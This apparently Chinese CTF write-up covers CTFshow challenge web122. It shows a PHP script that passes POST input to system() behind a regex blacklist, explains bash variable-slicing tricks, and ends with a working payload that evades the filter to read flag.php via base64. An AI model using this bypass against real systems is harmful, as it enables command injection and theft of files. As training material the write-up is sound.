CTFshow-WEB入门-命令执行web122
题目代码
<?php error_reporting(0); highlight_file(__FILE__); if(isset($_POST['code'])){ $code=$_POST['code']; if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|FLAG|PATH|BASH|PWD|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME|\/|\(|\)|\[|\]|\\\\|\+|\-|_|~|\!|\=|\^|\*|\x26|#|%|\>|\'|\"|\`|\||\,/', $code)){ if(strlen($code)>65){ echo '<div align="center">'.'you are so long , I dont like '.'</div>'; } else{ echo '<div align="center">'.system($code).'</div>'; } } else{ echo '<div align="center">evil input</div>'; } }
这道题需要通过切割环境变量的字符来达到命令执行
前置知识:
${HOME}可能为/root、${PATH}可能为bin、${PWD}可能为/var/www/html、${HOSTNAME}、${PHP_VERSION}、${USER}
${PATH:~0:1},取倒数第一个字符(倒着只能取一个,0可以用一个字母代替)
${PATH::1},从第一个切有时可以不写,有时还不能切片
$PATH,不切可以不加花括号
${?}是上一个命令的退出状态,无错误为0、执行p这种错误的为127、执行<A这种的为1
${#}和${?}为0、${##}和${#?}为1
${SHLVL}是记录多个Bash进程实例嵌套深度的累加器,第一次打开shell为1,shell中再打开一个shell为2
${IFS}为空格tab换行符(newline),长度为3
${RANDOM}通常是4、5位的随机数
${#xxx}加井号为结果的长度
解题:
目标命令:/???/?????4 ????.??? 等效 /bin/base64 flag.php
先执行 <A 让 $? 为1
/ 由 ${HOME::$?} 产生
4 由 ${RANDOM::$?} 产生
Payload:code=<A;${HOME::$?}???${HOME::$?}?????${RANDOM::$?} ????.???